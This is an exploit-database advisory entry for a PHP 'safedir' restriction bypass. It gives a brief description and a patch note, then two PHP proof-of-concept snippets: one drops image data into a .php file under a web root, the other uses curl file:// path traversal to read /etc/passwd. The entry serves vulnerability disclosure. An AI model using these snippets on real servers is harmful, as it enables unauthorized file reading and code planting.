PHP 'safedir' Directory Restriction Bypass Vulnerability

vendor:

Unknown

by:

Unknown

7.5

CVSS

HIGH

Directory Restriction Bypass

Unknown

CWE

Product Name: Unknown

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: YES

Related CWE: Unknown

CPE: php

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

PHP ‘safedir’ Directory Restriction Bypass Vulnerability

An attacker can bypass the 'safedir' directory restriction in PHP to execute arbitrary code or retrieve the contents of arbitrary files.

Mitigation:

The issues have been addressed in the latest CVS version of PHP.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/15119/info

PHP is prone to multiple vulnerabilities that permit an attacker to bypass the 'safedir' directory restriction.

An attacker can exploit these vulnerabilities to possible execute arbitrary code currently existing on a vulnerable system, or to retrieve the contents of arbitrary files, all in the security context of the Web server process.

Information obtained may aid in further attacks against the affected system; other attacks are also possible.

These issues have been addressed in the latest CVS version. 

<?php
$im = imagecreatefromgif("file.gif");
imagegif($im, '/var/www/f34r.fr/c/f/elbossoso/.i.need.money.php');
?>

<?php

mkdir("./".$_SERVER["SCRIPT_NAME"]."?");
$ch = curl_init("file://".$_SERVER["SCRIPT_FILENAME"]."?/../../../../../../../../../../../etc/passwd ");

$file=curl_exec($ch);

echo $file;

?>